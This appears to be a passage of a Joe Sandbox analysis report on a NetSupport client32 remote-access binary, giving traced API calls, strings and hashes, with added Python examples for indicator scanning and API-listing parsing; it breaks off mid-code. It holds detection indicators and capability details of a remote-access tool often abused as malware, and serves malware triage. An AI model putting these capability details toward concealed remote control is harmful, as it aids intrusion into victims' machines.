                                                                                  • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                  • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                                  • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                  • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                  Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: the same twelve 0000000B.00000002.* regions listed for the first function entry above
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                  • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                  • API String ID: 2188719708-2019804778
                                                                                  • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                  • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                  • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                  • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                  APIs
                                                                                    • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                    • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                    • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                    • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                    • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                  • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                    • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                    • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                  • wsprintfA.USER32 ref: 1103F5D1
                                                                                  • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                                  • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                                  • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                                  • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                    • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                    • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                    • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                  Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: the same twelve 0000000B.00000002.* regions listed for the first function entry above
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                                  • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 1300213680-78349004
                                                                                  • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                  • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                                  • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                  • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
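Added triage example (not part of the Joe Sandbox output and not NetSupport's code): a Python scanner that looks in a memory dump or dropped file for the client32 indicator strings the function entries on this page expose (the e:\nsmsrc\nsm\1210\1210f\ctl32\ build path, the SOFTWARE\Policies\NetSupport\Client\standard policy key from the entry that follows, the Wtsapi32.dll / WTSQuerySessionInformationA / WTSFreeMemory dynamic import, the gUI.hidden_window / UI.CPP hidden-window strings, blockapp.jpg / BlockedAppFile and the Client32 MessageBoxA caption) and extracts journal file names built by MakeFileName with the _%04d_%02d_%02d_%02d%02d format. The indicator families, the verdict thresholds and the journal-name regex are this example's own assumptions; the sample dump bytes are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Indicator strings copied from the function entries of this report (client32 image,
# process 0000000B, base 0x11000000). The grouping into families is this example's
# own choice: a family counts once no matter how many of its strings are present.
INDICATORS: Dict[str, List[bytes]] = {
    "build_path": [b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\"],
    "policy_key": [b"SOFTWARE\\Policies\\NetSupport\\Client\\standard"],
    "hidden_ui": [b"gUI.hidden_window", b"UI.CPP"],
    "client_caption": [b"Client32"],
    "wts_dynamic_import": [b"Wtsapi32.dll", b"WTSQuerySessionInformationA", b"WTSFreeMemory"],
    "block_app": [b"blockapp.jpg", b"BlockedAppFile"],
}

# Assumption: MakeFileName strips the characters \/:*?"<>| from the name and appends
# _%04d_%02d_%02d_%02d%02d (year, month, day, hour+minute), so a journal name looks
# like Lesson_2024_09_03_1412. Whitespace and control bytes are excluded as well.
JOURNAL_NAME_RE = re.compile(rb"[^\\/:*?\"<>|\s\x00-\x1f]{1,64}_\d{4}_\d{2}_\d{2}_\d{4}")

# Families that on their own tie a blob to the NetSupport client build (example's choice).
STRONG_FAMILIES = {"build_path", "policy_key"}


@dataclass
class TriageResult:
    hits: Dict[str, List[Tuple[int, str]]] = field(default_factory=dict)  # family -> (offset, string)
    journal_names: List[str] = field(default_factory=list)

    @property
    def families(self) -> List[str]:
        return sorted(self.hits)

    @property
    def verdict(self) -> str:
        if STRONG_FAMILIES & set(self.hits):
            return "netsupport"
        return "suspicious" if len(self.hits) >= 2 else "clean"


def find_all(blob: bytes, needle: bytes) -> List[int]:
    """Return every offset at which needle occurs in blob (overlaps included)."""
    offsets, start = [], 0
    while (off := blob.find(needle, start)) >= 0:
        offsets.append(off)
        start = off + 1
    return offsets


def scan(blob: bytes) -> TriageResult:
    """Scan a memory dump or dropped file for the client32 indicators above."""
    result = TriageResult()
    for family, needles in INDICATORS.items():
        for needle in needles:
            for off in find_all(blob, needle):
                result.hits.setdefault(family, []).append((off, needle.decode("ascii")))
    result.journal_names = [m.group(0).decode("ascii", errors="replace")
                            for m in JOURNAL_NAME_RE.finditer(blob)]
    return result


# Constructed sample: a fake dump fragment carrying a few of the strings; not real data.
SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"SOFTWARE\\Policies\\NetSupport\\Client\\standard\x00"
    + b"Wtsapi32.dll\x00WTSQuerySessionInformationA\x00WTSFreeMemory\x00"
    + b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\NSMString.h\x00"
    + b"[JNL] MakeFileName ret Lesson_2024_09_03_1412\x00"
    + b"gUI.hidden_window\x00"
)

if __name__ == "__main__":
    r = scan(SAMPLE_DUMP)
    print("verdict:", r.verdict, "families:", r.families, "journal:", r.journal_names)
```

To run it against the real artefacts, pass the bytes of a dumped region or the dropped client32 file to scan(). The "netsupport" verdict only says the blob is the NetSupport client; legitimate NetSupport Manager deployments carry the same strings, so whether it is an intrusion is decided by the delivery chain (script dropper, PowerShell staging, install path) rather than by these indicators alone, and "Client32" by itself is deliberately not treated as strong evidence.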
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 1105F251
                                                                                  • wsprintfA.USER32 ref: 1105F265
                                                                                    • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,76938400,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                    • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                  • wsprintfA.USER32 ref: 1105F5D6
                                                                                    • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Similarity
                                                                                  • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                                  • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 273891520-33395967
                                                                                  • Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                  • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                  • Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                  • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                  • API String ID: 2111968516-2092292787
                                                                                  • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                  • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                  • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                  • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 110695BD
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
                                                                                  • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
                                                                                  • GetTickCount.KERNEL32 ref: 11069621
                                                                                  • wsprintfA.USER32 ref: 11069651
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
                                                                                  Strings
                                                                                  • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                                  • CloseTransports slept for %u ms, xrefs: 11069630
                                                                                  • idata->n_connections=%d, xrefs: 1106964B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                                  • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                                  • API String ID: 2285713701-3017572385
                                                                                  • Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                  • Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
                                                                                  • Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                  • Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,7736C3F0,00000000), ref: 11065525
                                                                                    • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
                                                                                    • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
                                                                                  • GetDC.USER32(00000000), ref: 11065558
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 110655B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CapsDevice_strtok$Release__wcstoi64
                                                                                  • String ID: Fs$932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                                  • API String ID: 3945178471-136916385
                                                                                  • Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                  • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                                  • Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                  • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                                  APIs
                                                                                    • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                    • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                    • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
                                                                                  • _strrchr.LIBCMT ref: 1100D6EF
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 1100D6FF
                                                                                  • wsprintfA.USER32 ref: 1100D720
                                                                                  • _memset.LIBCMT ref: 1100D731
                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
                                                                                  • CloseHandle.KERNEL32(?,00000000), ref: 1100D781
                                                                                  • CloseHandle.KERNEL32(?), ref: 1100D78A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                  • String ID: %sNSSilence.exe %u %u$D
                                                                                  • API String ID: 1760462761-4146734959
                                                                                  • Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                  • Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
                                                                                  • Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                  • Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
                                                                                  APIs
                                                                                  • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                                  • GetStockObject.GDI32(00000007), ref: 11003089
                                                                                  • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                                  • SelectObject.GDI32(?,?), ref: 110030A7
                                                                                  • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                                  • GetSysColor.USER32(00000004), ref: 110030EB
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                                  • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                                  • SelectObject.GDI32(?,?), ref: 1100311E
                                                                                  • SelectObject.GDI32(?,?), ref: 11003128
                                                                                  • DeleteObject.GDI32(?), ref: 1100312E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                  • String ID:
                                                                                  • API String ID: 4121194973-0
                                                                                  • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                  • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                  • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                  • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 1113F7AB
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1113F7C0
                                                                                  • SetPropA.USER32(?,?,00000000), ref: 1113F84E
                                                                                  • GetPropA.USER32(?), ref: 1113F85D
                                                                                  • wsprintfA.USER32 ref: 1113F88F
                                                                                  • RemovePropA.USER32(?), ref: 1113F8C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
                                                                                  • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                  • API String ID: 2013984029-1590351400
                                                                                  • Opcode ID: d1e565686244c353336eb47f8c903c4bdfa7357e5d2a0cf1c96f8e279f79a4e6
                                                                                  • Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
                                                                                  • Opcode Fuzzy Hash: d1e565686244c353336eb47f8c903c4bdfa7357e5d2a0cf1c96f8e279f79a4e6
                                                                                  • Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1
                                                                                  APIs
                                                                                  • CountClipboardFormats.USER32 ref: 11033091
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                    • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                  • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                  • GetLastError.KERNEL32 ref: 110331BF
                                                                                  • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                  • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                  • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                  • API String ID: 3210887762-597690070
                                                                                  • Opcode ID: 7e59b2d9765c5538991e48177014fa313e8989defddd3899bc08b96e04566e40
                                                                                  • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                  • Opcode Fuzzy Hash: 7e59b2d9765c5538991e48177014fa313e8989defddd3899bc08b96e04566e40
                                                                                  • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
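The API listings in this report follow one export format: a bullet per resolved call, written `Name.MODULE(args), ref: call-site`, with calls reached through a helper prefixed `Part of subcall function <addr>:` and unresolved arguments shown as `?`. The Python below is an added example, not part of this report or of Joe Sandbox: it parses such a listing into records, separates direct calls from those made via sub-functions, groups APIs by module, pulls out literal string arguments (here `Client32`, the MessageBoxA caption), and applies a small capability heuristic. The `CAPABILITIES` map is the example's own assumption, not the sandbox's signature logic. The sample input is the clipboard function's APIs block from the listing above.

```python
import re
from collections import defaultdict

# Constructed sample input: the "APIs" block of the client32 clipboard function,
# copied from the report listing above (Joe Sandbox function-export format).
SAMPLE = """\
• CountClipboardFormats.USER32 ref: 11033091
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
• EnumClipboardFormats.USER32(00000000), ref: 110330F6
• GetLastError.KERNEL32 ref: 110331BF
• GetLastError.KERNEL32(00000000), ref: 110331C2
• IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
"""

# One bullet per call: [Part of subcall function ADDR:] Name.MODULE[(args)][,] ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumed triage heuristic for this example (not the sandbox's own signature logic):
# if any of these APIs is present, note the capability.
CAPABILITIES = {
    "clipboard": {"CountClipboardFormats", "EnumClipboardFormats",
                  "IsClipboardFormatAvailable", "GetClipboardData"},
}


def classify_arg(tok):
    """Bucket a traced argument: '?' (unresolved), an 8-hex-digit immediate, or a literal string."""
    tok = tok.strip()
    if tok == "?":
        return "unknown"
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return "immediate"
    return "string"


def parse_api_lines(text):
    """Parse a Joe Sandbox 'APIs' listing into one dict per traced call."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw = m.group("args")
        args = [] if raw is None else [a.strip() for a in raw.split(",")]
        records.append({
            "api": m.group("name"),
            "module": m.group("module"),
            "ref": int(m.group("ref"), 16),   # call-site address inside the dump
            "subcall": m.group("sub"),        # None when the function calls the API directly
            "args": args,
            "arg_kinds": [classify_arg(a) for a in args],
        })
    return records


def summarize(records):
    """Group calls the way a triager reads them: direct vs. via helper, per module, strings, capabilities."""
    by_module = defaultdict(set)
    for r in records:
        by_module[r["module"]].add(r["api"])
    apis = {r["api"] for r in records}
    strings = {a for r in records
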